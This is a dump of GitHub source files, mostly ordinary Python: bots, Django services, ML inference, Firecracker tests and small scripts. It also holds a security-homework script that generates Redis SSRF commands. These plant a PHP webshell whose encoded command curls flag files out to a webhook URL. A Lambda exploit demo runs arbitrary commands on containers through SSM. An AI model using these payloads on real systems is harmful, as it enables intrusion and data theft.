[{}]\".format(len(member.roles) -1 ), value=role_string, inline=False)\n return await ctx.send(embed=embed)\n else:\n embed.add_field(name=\"Roles:\", value=\"None\")\n return await ctx.send(embed=embed)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef setup(bot):\n bot.add_cog(botinfo(bot))\n\n","repo_name":"SenpaiDesi/Vandals-Bot","sub_path":"moderation/botinfo.py","file_name":"botinfo.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8825877874","text":"import random\n\nfrom django.contrib.auth.models import Group\n\nfrom api.admin_users.models import AdminUser\nfrom api.admin_users.selectors.select_reviewers import \\\n select_random_reviewer_by_group\nfrom api.capital_calls.models import FundCapitalCall\nfrom api.funds.models import Fund\nfrom api.users.constants import CAPITAL_CALL_REVIEWER\nfrom api.workflows.models import Task, WorkFlow\n\n\nclass CreateCapitalCallTask:\n def __init__(self, fund: Fund, capital_call: FundCapitalCall, admin_user: AdminUser):\n self.fund = fund\n self.capital_call = capital_call\n self.admin_user = admin_user\n\n def create_workflow_task(self):\n name = f'Capital-Call-review'\n workflow = WorkFlow.objects.create(\n name=f'{name}-workflow',\n fund=self.fund,\n company=self.fund.company,\n created_by=self.admin_user,\n workflow_type=WorkFlow.WorkFlowTypeChoices.REVIEW.value,\n module=WorkFlow.WorkFlowModuleChoices.CAPITAL_CALL.value\n )\n\n self.capital_call.workflow = workflow\n self.capital_call.save()\n\n reviewer = select_random_reviewer_by_group(company=self.fund.company, group_name=CAPITAL_CALL_REVIEWER)\n group = Group.objects.filter(name=CAPITAL_CALL_REVIEWER).first()\n Task.objects.create(\n workflow=workflow,\n assigned_to=reviewer,\n assigned_to_group=group,\n task_type=Task.TaskTypeChoice.REVIEW_REQUEST.value,\n name=f'{name}-task',\n status=Task.StatusChoice.PENDING.value\n )\n","repo_name":"tayyabsaleem7756/jobtest","sub_path":"backend/retail_market/api/capital_calls/services/create_capital_call_task.py","file_name":"create_capital_call_task.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34487092521","text":"from transformers import BertModel, BertTokenizer\nfrom tokenizers import BertWordPieceTokenizer\nimport torch\nimport torch.nn as nn\nimport string\n\nclass config:\n MAX_LEN = 128\n TOKENIZER = BertWordPieceTokenizer('/home/koushik/Documents/Pretrained Models/bert-base-uncased/vocab.txt')\n BERT_PATH = '/home/koushik/Documents/Pretrained Models/bert-base-uncased'\n\nclass BERTBaseUncased(nn.Module):\n def __init__(self):\n super(BERTBaseUncased, self).__init__()\n self.bert = BertModel.from_pretrained(config.BERT_PATH)\n self.l0 = nn.Linear(768, 2)\n\n def forward(self, ids, mask, token_type_ids):\n sequence_output, pooled_output = self.bert(\n ids,\n attention_mask = mask,\n token_type_ids = token_type_ids\n )\n logits = self.l0(sequence_output)\n start_logits, end_logits = logits.split(1, dim=-1)\n start_logits = start_logits.squeeze(-1)\n end_logits = end_logits.squeeze(-1)\n return start_logits, end_logits\n\nmodel = BERTBaseUncased()\nmodel = nn.DataParallel(model)\nmodel.load_state_dict(torch.load('sentiment_extraction/bert model/model.bin'))\nmodel.eval()\n\ndef predict(tweet, sentiment, max_len=config.MAX_LEN, tokenizer=config.TOKENIZER):\n tweet = (\" \".join(str(tweet).split(\" \"))).strip()\n \n if sentiment == \"neutral\" or len(tweet.split()) < 4:\n return tweet\n\n encoded_tweet = tokenizer.encode(tweet)\n tweet_tokens = encoded_tweet.tokens\n tweet_ids = encoded_tweet.ids\n mask = [1] * len(tweet_ids)\n token_type_ids = [0] * len(tweet_ids)\n\n padding_len = max_len - len(tweet_ids)\n ids = tweet_ids + [0] * padding_len\n mask = mask + [0] * padding_len\n token_type_ids = token_type_ids + [0] * padding_len\n\n ids = torch.tensor([ids], dtype=torch.long)\n mask = torch.tensor([mask], dtype=torch.long)\n token_type_ids = torch.tensor([token_type_ids], dtype=torch.long)\n\n start, end = model(ids, mask, token_type_ids)\n start = start.cpu().view(-1)[1:-(padding_len+1)]\n end = end.cpu().view(-1)[1:-(padding_len+1)]\n\n _, idx_start = start.max(0)\n _, idx_end = end.max(0)\n\n output = \"\"\n tweet_tokens = tweet_tokens[1: -1]\n for i in range(idx_start, idx_end+1):\n if tweet_tokens[i] in ('CLS', 'SEP'):\n continue\n elif tweet_tokens[i].startswith(\"##\"):\n output += tweet_tokens[i][2:]\n elif len(tweet_tokens[i])==1 and tweet_tokens[i] in string.punctuation:\n output += tweet_tokens[i]\n else:\n output += (\" \"+tweet_tokens[i])\n if len(output) == 0:\n output = tweet\n return output.strip()","repo_name":"KoushikSahu/sentiment-extraction-webapp","sub_path":"src/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22342767478","text":"import platform\nimport tempfile\n\nimport pytest\nfrom test_balloon import _test_rss_memory_lower\n\nimport host_tools.drive as drive_tools\nfrom framework.microvm import SnapshotType\nfrom framework.properties import global_props\n\n# Define 4 scratch drives.\nscratch_drives = [\"vdb\", \"vdc\", \"vdd\", \"vde\"]\n\n\ndef test_restore_old_to_current(\n microvm_factory, guest_kernel, rootfs_ubuntu_22, firecracker_release\n):\n \"\"\"\n Restore snapshots from previous supported versions of Firecracker.\n\n For each firecracker release:\n 1. Snapshot with the past release\n 2. Restore with the current build\n \"\"\"\n\n # due to bug fixed in commit 8dab78b\n firecracker_version = firecracker_release.version_tuple\n if global_props.instance == \"m6a.metal\" and firecracker_version < (1, 3, 3):\n pytest.skip(\"incompatible with AMD and Firecracker <1.3.3\")\n\n # Microvm: 2vCPU 256MB RAM, balloon, 4 disks and 4 net devices.\n diff_snapshots = True\n vm = microvm_factory.build(\n guest_kernel,\n rootfs_ubuntu_22,\n fc_binary_path=firecracker_release.path,\n jailer_binary_path=firecracker_release.jailer,\n )\n vm.spawn()\n vm.basic_config(track_dirty_pages=True)\n snapshot = create_snapshot_helper(\n vm,\n drives=scratch_drives,\n diff_snapshots=diff_snapshots,\n balloon=diff_snapshots,\n )\n vm = microvm_factory.build()\n vm.spawn()\n vm.restore_from_snapshot(snapshot, resume=True)\n validate_all_devices(vm, diff_snapshots)\n print(vm.log_data)\n\n\ndef test_restore_current_to_old(microvm_factory, uvm_plain, firecracker_release):\n \"\"\"\n Restore current snapshot with previous versions of Firecracker.\n\n For each firecracker release:\n 1. Snapshot with the current build\n 2. Restore with the past release\n \"\"\"\n\n # Microvm: 2vCPU 256MB RAM, balloon, 4 disks and 4 net devices.\n vm = uvm_plain\n vm.spawn()\n vm.basic_config(track_dirty_pages=True)\n\n # Create a snapshot with current FC version targeting the old version.\n snapshot = create_snapshot_helper(\n vm,\n target_version=firecracker_release.snapshot_version,\n drives=scratch_drives,\n balloon=True,\n diff_snapshots=True,\n )\n\n # Resume microvm using FC/Jailer binary artifacts.\n vm = microvm_factory.build(\n fc_binary_path=firecracker_release.path,\n jailer_binary_path=firecracker_release.jailer,\n )\n vm.spawn()\n vm.restore_from_snapshot(snapshot, resume=True)\n validate_all_devices(vm, True)\n print(\"========== Firecracker restore snapshot log ==========\")\n print(vm.log_data)\n\n\n@pytest.mark.skipif(platform.machine() != \"x86_64\", reason=\"TSC is x86_64 specific.\")\ndef test_save_tsc_old_version(uvm_nano):\n \"\"\"\n Test TSC warning message when saving old snapshot.\n \"\"\"\n uvm_nano.start()\n uvm_nano.snapshot_full(target_version=\"0.24.0\")\n uvm_nano.check_log_message(\"Saving to older snapshot version, TSC freq\")\n\n\ndef validate_all_devices(microvm, balloon):\n \"\"\"Perform a basic validation for all devices of a microvm.\"\"\"\n # Test that net devices have connectivity after restore.\n for iface in microvm.iface.values():\n print(\"Testing net device\", iface[\"iface\"].dev_name)\n microvm.guest_ip = iface[\"iface\"].guest_ip\n exit_code, _, _ = microvm.ssh.run(\"sync\")\n\n # Drop page cache.\n # Ensure further reads are going to be served from emulation layer.\n cmd = \"sync; echo 1 > /proc/sys/vm/drop_caches\"\n exit_code, _, _ = microvm.ssh.run(cmd)\n assert exit_code == 0\n\n # Validate checksum of /dev/vdX/test.\n # Should be ab893875d697a3145af5eed5309bee26 for 10 pages\n # of zeroes.\n for drive in list(microvm.disks)[1:]:\n # Mount block device.\n print(\"Testing drive \", drive)\n cmd = f\"mkdir -p /tmp/{drive} ; mount /dev/{drive} /tmp/{drive}\"\n exit_code, _, _ = microvm.ssh.run(cmd)\n assert exit_code == 0\n\n # Validate checksum.\n cmd = f\"md5sum /tmp/{drive}/test | cut -d ' ' -f 1\"\n exit_code, stdout, _ = microvm.ssh.run(cmd)\n assert exit_code == 0\n assert stdout.strip() == \"ab893875d697a3145af5eed5309bee26\"\n print(\"* checksum OK.\")\n\n if balloon is True:\n print(\"Testing balloon memory reclaim.\")\n # Call helper fn from balloon integration tests.\n _test_rss_memory_lower(microvm)\n\n\ndef create_snapshot_helper(\n vm,\n target_version=None,\n drives=None,\n balloon=False,\n diff_snapshots=False,\n):\n \"\"\"Create a snapshot with many devices.\"\"\"\n if diff_snapshots is False:\n snapshot_type = SnapshotType.FULL\n else:\n # Version 0.24 and greater has Diff and balloon support.\n snapshot_type = SnapshotType.DIFF\n\n if balloon:\n # Add a memory balloon with stats enabled.\n vm.api.balloon.put(\n amount_mib=0, deflate_on_oom=True, stats_polling_interval_s=1\n )\n\n test_drives = [] if drives is None else drives\n\n # Add disks.\n for scratch in test_drives:\n # Add a scratch 64MB RW non-root block device.\n scratchdisk = drive_tools.FilesystemFile(tempfile.mktemp(), size=64)\n vm.add_drive(scratch, scratchdisk.path)\n\n # Workaround FilesystemFile destructor removal of file.\n scratchdisk.path = None\n\n for _ in range(4):\n vm.add_net_iface()\n\n vm.start()\n\n # Iterate and validate connectivity on all ifaces after boot.\n for i in range(4):\n exit_code, _, _ = vm.ssh_iface(i).run(\"sync\")\n assert exit_code == 0\n\n # Mount scratch drives in guest.\n for blk in test_drives:\n # Create mount point and mount each device.\n cmd = f\"mkdir -p /tmp/mnt/{blk} && mount /dev/{blk} /tmp/mnt/{blk}\"\n exit_code, _, _ = vm.ssh.run(cmd)\n assert exit_code == 0\n\n # Create file using dd using O_DIRECT.\n # After resume we will compute md5sum on these files.\n dd = f\"dd if=/dev/zero of=/tmp/mnt/{blk}/test bs=4096 count=10 oflag=direct\"\n exit_code, _, _ = vm.ssh.run(dd)\n assert exit_code == 0\n\n # Unmount the device.\n cmd = f\"umount /dev/{blk}\"\n exit_code, _, _ = vm.ssh.run(cmd)\n assert exit_code == 0\n\n snapshot = vm.make_snapshot(snapshot_type, target_version=target_version)\n print(\"========== Firecracker create snapshot log ==========\")\n print(vm.log_data)\n vm.kill()\n return snapshot\n","repo_name":"firecracker-microvm/firecracker","sub_path":"tests/integration_tests/functional/test_snapshot_advanced.py","file_name":"test_snapshot_advanced.py","file_ext":"py","file_size_in_byte":6431,"program_lang":"python","lang":"en","doc_type":"code","stars":22949,"dataset":"github-code","pt":"53"} +{"seq_id":"74103192807","text":"import os, sys\nimport time\nimport logging\nimport yaml\nimport json\nimport psycopg2\nimport datetime\n\nlogging.basicConfig(level=logging.INFO, format=' %(asctime)s - %(levelname)s - %(message)s')\n\n\ndef on_disconnect(client, userdata, rc):\n logging.info(\"MQTT Client Got Disconnected\")\n\ndef on_connect(client, userdata, flags, rc):\n logging.info(\"MQTT Connected With Result Code \"+str(rc))\n logging.info(\"MQTT Subscribing to topic: \" + cfg['mqtt']['topic'])\n client.subscribe(cfg['mqtt']['topic'])\n\ndef on_log(client, userdata, level, buf):\n logging.debug(\"log: \" + str(buf))\n\ndef on_message(client, userdata, message):\n logging.debug(\"message received :\" + str(message.payload.decode()))\n #logging.debug(\"message topic=\",message.topic)\n #logging.debug(\"message qos=\",message.qos)\n #logging.debug(\"message retain flag=\",message.retain)\n global errorcount\n data = json.loads(message.payload.decode())\n logging.debug(\"JSON:\" + str(data))\t\n timestamp = data[\"datetime\"]\n temp = data[\"koi_temperature\"]\n sql = \"\"\"INSERT into fishtanksensordata (measurement_timestamp,temperature_degf) values (%s,%s)\"\"\"\n logging.info(\"Wrote Message - Timestamp:\" + str(timestamp) + \", Data: \" + str(temp) + \", errorcount:\" + str(errorcount))\n try:\n cursor.execute(sql, (timestamp, temp))\n conn.commit()\n errorcount = 0\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n print(\"SQL statement:\" + sql)\n print(\"Data: \" + str(temp))\n #conn.rollback()\n errorcount = errorcount + 1\n if (errorcount > 5):\n sys.exit()\n\ndef writePidFile():\n pid = str(os.getpid())\n currentFile = open('/tmp/writepostgres.pid', 'w')\n currentFile.write(pid)\n currentFile.close()\n\t\nerrorcount = 0\n\nwith open(\"config.yml\", 'r') as ymlfile:\n cfg = yaml.load(ymlfile)\n\nlogging.info(\"Connecting to Postgres as: \" + cfg['postgres']['user'] )\n\ntry:\n connect_str = \"dbname='\"+ cfg['postgres']['dbname'] +\"' user='\"+ cfg['postgres']['user'] +\"' \" + \\\n \"host='\"+ cfg['postgres']['host'] +\"' password='\"+ cfg['postgres']['password'] +\"'\"\n # use our connection values to establish a connection\n conn = psycopg2.connect(connect_str)\n\n # create a psycopg2 cursor that can execute queries\n cursor = conn.cursor()\n\nexcept Exception as e:\n print(\"Uh oh, can't connect. Invalid dbname, user or password?\")\n print(e)\n sys.exit()\n\nwritePidFile()\nlogging.info(\"MQTT Setup - Host: \" + cfg['mqtt']['host'] + \", Topic: \" + cfg['mqtt']['topic'] )\n\n# MQTT Client setup:\nif cfg['mqtt']['enabled'] == True:\n import paho.mqtt.client as mqtt\n\n # clean_session = True. clean_session is a Boolean value set to True by default. If set to True, the broker removes all the information about the client during disconnection & reconnection. If set to False the broker will retain the subscription information & queued messages during disconnection & reconnection.\n client = mqtt.Client(\"writepostgres\", clean_session=True) #create new instance\n \n # attach functions to callback\n # client.on_log=on_log #useful for debug\n client.on_message = on_message\n client.on_connect = on_connect\n client.on_disconnect = on_disconnect \n\n client.connect(cfg['mqtt']['host']) #connect to broker\n\nclient.loop_forever()\n","repo_name":"kmkingsbury/pi-fishtank-sensors","sub_path":"writepostgres.py","file_name":"writepostgres.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14368345805","text":"from pywinauto.application import Application\n\napp = Application().Start(cmd_line=u'\"C:\\\\Program Files (x86)\\\\Notepad++\\\\notepad++.exe\" ')\nnotepad = app[u'Notepad++']\nnotepad.Wait('ready')\nmenu_item = notepad.MenuItem(u'&?->\\u95dc\\u65bc Notepad++...\\tF1')\nmenu_item.Click()\n\napp.notepad.Edit.TypeKeys(\"1\\thello,hello\\rwahaha\")\n# app.Kill_()cls\n","repo_name":"kimlin20011/UI-test","sub_path":"pwa_test1/start_nodepadAndhelp.py","file_name":"start_nodepadAndhelp.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17683975238","text":"file = open(\"8december.txt\",\"r\")\nlines = file.readlines()\n\ndef solve():\n result = 0\n map = []\n #create 2d array\n for line in lines:\n listOfChar = list(line.strip())\n listOfChar = ([int(x) for x in listOfChar])\n map.append(listOfChar)\n #run though 2d array\n for i in range(len(map)):\n for j in range(len(map[i])):\n #gets list of edges\n edges = getViews(map, j, i)\n #result += treeValid(edges, map[i][j])\n print(result)\n\ndef getViews(map,x,y):\n #top right bottom left. minus hvis ingen edge\n x = 2\n y = 3\n result = [1,1,1,1]\n if x == 0 or y == 0 or x == len(map[y])-1 or y == len(map)-1:\n return []\n #get biggest top\n top = True\n for ys in range(y-1,-1,-1):\n if map[ys][x] < map[y][x] and top and ys-1 > 0:\n result[0] += 1\n else:\n top = False\n #get biggest bottom\n bottom = True\n for ys in range(y+1,len(map)):\n if map[ys][x] < map[y][x] and bottom and ys+1 < len(map):\n result[2] += 1\n else:\n bottom = False\n #get biggest right\n right = True\n for xs in range(x+1,len(map[y])):\n if map[y][xs] < map[y][x] and right and xs+1 < len(map[y]):\n result[1] += 1\n else:\n right = False\n #get biggest left\n left = True\n for xs in range(x-1,-1,-1):\n if map[y][xs] < map[y][x] and left and x-xs > 0:\n result[3] += 1\n else:\n left = False\n return result\n \ndef treeValid(list, tree):\n for number in list:\n if number < tree or number == -1:\n return 1\n return 0\n\nsolve()","repo_name":"DanielKoltze/adventofcode","sub_path":"8/8december2.py","file_name":"8december2.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42658820209","text":"\"\"\"\n\nThis script calculates the observation scalars (H matrix) for fusing optical flow\nmeasurements for terrain estimation.\n\n@author: roman\n\"\"\"\n\nfrom sympy import *\n\n# q: quaternion describing rotation from frame 1 to frame 2\n# returns a rotation matrix derived form q which describes the same\n# rotation\ndef quat2Rot(q):\n q0 = q[0]\n q1 = q[1]\n q2 = q[2]\n q3 = q[3]\n\n Rot = Matrix([[q0**2 + q1**2 - q2**2 - q3**2, 2*(q1*q2 - q0*q3), 2*(q1*q3 + q0*q2)],\n [2*(q1*q2 + q0*q3), q0**2 - q1**2 + q2**2 - q3**2, 2*(q2*q3 - q0*q1)],\n [2*(q1*q3-q0*q2), 2*(q2*q3 + q0*q1), q0**2 - q1**2 - q2**2 + q3**2]])\n\n return Rot\n\n# take an expression calculated by the cse() method and write the expression\n# into a text file in C format\ndef write_simplified(P_touple, filename, out_name):\n subs = P_touple[0]\n P = Matrix(P_touple[1])\n fd = open(filename, 'a')\n\n is_vector = P.shape[0] == 1 or P.shape[1] == 1\n\n # write sub expressions\n for index, item in enumerate(subs):\n fd.write('float ' + str(item[0]) + ' = ' + str(item[1]) + ';\\n')\n\n # write actual matrix values\n fd.write('\\n')\n\n if not is_vector:\n iterator = range(0,sqrt(len(P)), 1)\n for row in iterator:\n for column in iterator:\n fd.write(out_name + '(' + str(row) + ',' + str(column) + ') = ' + str(P[row, column]) + ';\\n')\n else:\n iterator = range(0, len(P), 1)\n\n for item in iterator:\n fd.write(out_name + '(' + str(item) + ') = ' + str(P[item]) + ';\\n')\n\n fd.write('\\n\\n')\n fd.close()\n\n########## Symbolic variable definition #######################################\n\n\n# vehicle velocity\nv_x = Symbol(\"v_x\", real=True) # vehicle body x velocity\nv_y = Symbol(\"v_y\", real=True) # vehicle body y velocity\n\n# unit quaternion describing vehicle attitude, qw is real part\nqw = Symbol(\"q0\", real=True)\nqx = Symbol(\"q1\", real=True)\nqy = Symbol(\"q2\", real=True)\nqz = Symbol(\"q3\", real=True)\nq_att = Matrix([qw, qx, qy, qz])\n\n# terrain vertial position in local NED frame\n_terrain_vpos = Symbol(\"_terrain_vpos\", real=True)\n\n_terrain_var = Symbol(\"_terrain_var\", real=True)\n\n# vehicle vertical position in local NED frame\npos_z = Symbol(\"z\", real=True)\n\nR_body_to_earth = quat2Rot(q_att)\n\n# Optical flow around x axis\nflow_x = -v_y / (_terrain_vpos - pos_z) * R_body_to_earth[2,2]\n\n# Calculate observation scalar\nH_x = Matrix([flow_x]).jacobian(Matrix([_terrain_vpos]))\n\nH_x_simple = cse(H_x, symbols('t0:30'))\n\n# Optical flow around y axis\nflow_y = v_x / (_terrain_vpos - pos_z) * R_body_to_earth[2,2]\n\n# Calculate observation scalar\nH_y = Matrix([flow_y]).jacobian(Matrix([_terrain_vpos]))\n\nH_y_simple = cse(H_y, symbols('t0:30'))\n\nwrite_simplified(H_x_simple, \"flow_x_observation.txt\", \"Hx\")\nwrite_simplified(H_y_simple, \"flow_y_observation.txt\", \"Hy\")\n\n","repo_name":"PX4/PX4-ECL","sub_path":"EKF/python/terrain_flow_derivation/derive_terrain_flow.py","file_name":"derive_terrain_flow.py","file_ext":"py","file_size_in_byte":2853,"program_lang":"python","lang":"en","doc_type":"code","stars":428,"dataset":"github-code","pt":"53"} +{"seq_id":"71677351848","text":"\r\nimport pandas as pd\r\nimport json\r\n\r\n\r\ndef Process_Raw_Inputs(df):\r\n patients = []\r\n for patient_index, pat_data in df.groupby(['IDX', 'IDX_TYPE']):\r\n visits = []\r\n for visit_index, visit_data in pat_data.groupby(['BILLABLE_START_DT']):\r\n inputs = {}\r\n for idx, row in visit_data.iterrows():\r\n inputs[row['CODE_TYPE']] = str(row['CODE_CSV']).split(',')\r\n inputs['DAYS_SINCE_FIRST'] = row['DAYS_SINCE_FIRST']\r\n inputs['DAYS_SINCE_LAST'] = row['DAYS_SINCE_LAST']\r\n visits.append(inputs)\r\n patients.append(visits)\r\n return patients\r\n \r\ndef flatten_visit(visit, code_types): \r\n codes = []\r\n for code_type in code_types:\r\n if code_type in visit.keys():\r\n codes.extend(visit[code_type])\r\n return codes\r\n\r\ndef Combine_Codes(patient_visit_list, code_types):\r\n \"\"\"Combines codes within a visit based on the specified code_types.\r\n Parameters\r\n ----------\r\n patient_visit_list : list, required\r\n a list of of listed dictionaries. Patients and their visits and various code types \r\n within that visit. [[{}, {}], [{}, {}, {}]] \r\n Returns\r\n ------\r\n list of listed lists. Patients and their visits' combined codes\r\n \"\"\"\r\n patients = []\r\n for patient in patient_visit_list:\r\n converted_visits = []\r\n for visit in patient:\r\n converted_visits.append(flatten_visit(visit, code_types))\r\n patients.append(converted_visits)\r\n return patients\r\n","repo_name":"claydustin/Clinical-Embeddings","sub_path":"RawDatasets.py","file_name":"RawDatasets.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2235671083","text":"import urllib\nprotocol=\"dict://\"\nip=\"0x7f.0x00.0x00.0x01\"\nport=\"27134\"\nshell=\"\\x3c\\x3f\\x70\\x68\\x70\\x20system\\x28base64_decode\\x28\\x27Y3VybCBodHRwczovL3dlYmhvb2suc2l0ZS9hZmI3NzA1Yi02YmM3LTRkZGEtYjQzNy0yNzY5NDAwYzQ0Y2IvJChiYXNlNjQgLXcwIC9mbGFnKik\\x27\\x29\\x29\\x3b\\x20\\x3f\\x3e\"\nfilename=\"pwn.inc.php\"\npath=\"/tmp\"\npasswd=\"\"\ncmd=[\"flushall\",\n\t \"set 1 \\\"{}\\\"\".format(shell),\n \"config set dir {}\".format(path),\n \"config set dbfilename {}\".format(filename),\n \"save\"\n ]\n\ndef redis_format(arr):\n CRLF=\"\\r\\n\"\n redis_arr = arr.split(\" \")\n cmd=\"\"\n cmd+=\"*\"+str(len(redis_arr))\n for x in redis_arr:\n cmd+=CRLF+\"$\"+str(len((x.replace(\"${IFS}\",\" \"))))+CRLF+x.replace(\"${IFS}\",\" \")\n cmd+=CRLF\n return cmd\n\ndef generate(arr):\n\tfor _ in cmd:\n\t\tpayload=protocol+ip+\":\"+port+\"/\"\n\t\tpayload += _\n\t\tprint(payload)\n\nif __name__==\"__main__\":\n\tgenerate(cmd)\n","repo_name":"Smileyezzz/Program-Security","sub_path":"Web/Homework06/redis_payload.py","file_name":"redis_payload.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23528869073","text":"import boto3\nimport time\n\ndef lambda_handler(event, context):\n remote = event['url']\n cmd = event['cmd']\n inst_detail = \"\"\n server = \"\"\n print(\"[+] Checking if Content-Selectors exist =>\", end=' ')\n try:\n ec2 = boto3.client('ec2')\n\n if remote == \"app.bryceindustries.net\":\n server = \"Shellshock-Docker-PT-Tejas\"\n filters = [{\n 'Name': 'tag:Name',\n 'Values': ['Shellshock-Docker-PT-Tejas']\n }]\n else:\n server = \"Protected-DS-Struts-Docker-tejas\"\n filters = [{\n 'Name': 'tag:Name',\n 'Values': ['Protected-DS-Struts-Docker-tejas']\n }]\n\n reservations = ec2.describe_instances(Filters=filters)\n print(reservations)\n for instances in reservations['Reservations']:\n for instance in instances['Instances']:\n print(instance['InstanceId'])\n inst_detail=instance['InstanceId']\n\n ssm = boto3.client('ssm')\n ssm_document = \"Inter-container-attack\"\n print(\"ssm variable done\")\n cmd_details = ssm.send_command(\n Targets=[\n {\n 'Key': 'tag:Name',\n 'Values': [server]\n }\n ],\n DocumentName=ssm_document,\n Comment='east-west traffic exploit',\n Parameters={\n 'cmd': [\n cmd\n ]\n }\n )\n cmd_id = cmd_details[\"Command\"][\"CommandId\"]\n\n print(cmd_id)\n time.sleep(10)\n output = ssm.get_command_invocation(CommandId=cmd_id, InstanceId=inst_detail)\n print(output)\n print(\"Command executed from vulnerable Container to Victim container\")\n if output['StandardOutputContent'] != \"\":\n var_return = output['StandardOutputContent']\n else:\n var_return = \"Container Exploit Failed with exception!!\"\n\n return var_return\n\n except Exception as e:\n print(\"Exiting... Target is not exploitable\" + str(e))\n\n var_return = \"FAILURE!!! Exploit has failed to execute exploit. east west traffic in victim container is protected\"\n return var_return\n\n\n","repo_name":"tsheth/Nexus-exploit-demo","sub_path":"Inter-container-exploit-doc/Lambda-CVE-2014-6271-Exploit.py","file_name":"Lambda-CVE-2014-6271-Exploit.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37752682647","text":"def is_diagonal(lol):\r\n for row in range(len(lol)):\r\n for value in range(len(lol[row])):\r\n if row != value and lol[row][value] != 0:\r\n return False\r\n return True\r\n\r\n\r\n\r\n\r\n\r\ndef is_upper_triangular(lol):\r\n for row in range(1, len(lol)):\r\n for value in range(0, row):\r\n if lol[row][value] != 0:\r\n return False\r\n return True\r\n\r\n \r\n \r\n\r\n\r\n\r\ndef contains(lol, value):\r\n '''for row in range(len(lol)):'''\r\n for row in lol:\r\n for item in row:\r\n if item == value:\r\n return True\r\n return False\r\n\r\n\r\n\r\n\r\n\r\ndef biggest(lol):\r\n biggest_item = []\r\n for row in lol:\r\n for item in row:\r\n biggest_item.append(item)\r\n return max(biggest_item)\r\n\r\n\r\n \r\ndef indices_biggest(lol):\r\n if len(lol) == 1 and len(lol[0]) == 1:\r\n return [0, 0]\r\n big = biggest(lol)\r\n for i in range(len(lol)):\r\n for j in range(len(lol[0])):\r\n if lol[i][j] == big:\r\n return [i, j]\r\n\r\n\r\ndef second_biggest(lol):\r\n return sorted(value for row in lol for value in row)[-2]\r\n\r\n\r\n\r\n\r\n'''def indices_second_biggest():\r\n'''\r\n\r\n\r\n\r\ndef substr_in_values(dictionary, string):\r\n lst = []\r\n\r\n for key in dictionary:\r\n for value in dictionary[key]:\r\n if string.lower() in value.lower():\r\n lst.append(key)\r\n break\r\n return sorted(lst)\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef indices_divisible_by_3(lol):\r\n number_dict = []\r\n for row in range(len(lol)):\r\n for value in range(len(lol[0])):\r\n if (value + row) % 3 == 0:\r\n number_dict.append(lol[row][value])\r\n return number_dict\r\n\r\n\r\n\r\n\r\n\r\ndef sort_int_string(string):\r\n string = string.strip().split()\r\n final_lst = []\r\n\r\n for value in string:\r\n final_lst.append(int(value))\r\n final_lst = sorted(final_lst)\r\n\r\n return_string = \" \"\r\n\r\n for value in final_lst:\r\n return_string += str(value) + \" \"\r\n return return_string.strip()\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\ndef dups_lol(lol):\r\n duplicate_lst = []\r\n\r\n for row in lol:\r\n for value in row:\r\n if value not in duplicate_lst:\r\n duplicate_lst.append(value)\r\n else:\r\n return True\r\n return False\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef dups_dict(dictionary): \r\n duplicate_lst = []\r\n\r\n for key in dictionary:\r\n duplicate_lst.append(dictionary[key])\r\n\r\n return dups_lol(duplicate_lst)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"akaif95/2D-Practice","sub_path":"2D_Practice.py","file_name":"2D_Practice.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"914762683","text":"from random import randrange\n\ndef quicksort(arr):\n size = len(arr)\n if size<=1:\n return arr\n else:\n pivot = arr.pop(randrange(size))\n lesser = quicksort([x for x in arr if x < pivot])\n greater = quicksort([x for x in arr if x >= pivot])\n return lesser + [pivot] + greater\n\nif __name__ == '__main__':\n array = []\n for i in range(10):\n array.append(randrange(100))\n\n print(\"Orignal array: \", array)\n sorted_array = quicksort(array)\n print(\"Sorted array: \", sorted_array)\n","repo_name":"abhishekgupta5/Algorithms","sub_path":"sorting/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72878920488","text":"# Link : https://codeforces.com/problemset/problem/1730/C\n# author : Mohamed Ibrahim\n\n\nfor _ in range(int(input())):\n s = input()\n a = list(int(x) for x in s)\n a.reverse()\n m = 10\n for i in range(len(s)):\n if a[i] > m:\n a[i] = min(a[i]+1,9)\n m = min(a[i],m)\n print(''.join(str(x) for x in sorted(a)))\n\n\n","repo_name":"M0hamedIbrahim1/Problem-Solving-Python-","sub_path":"Data Structure Problems/C. Minimum Notation.py","file_name":"C. Minimum Notation.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"7023548282","text":"# coding: utf8\n'''\nCreated on 2018��9��17��\n\n@author: ll\n'''\nimport finance_factor_calc as fic\nfrom finance_factor_calc import finance_index_dic as FID\nimport stock_data_download\nimport pandas as pd\nimport os\n\nclass finance_index_rank:\n def 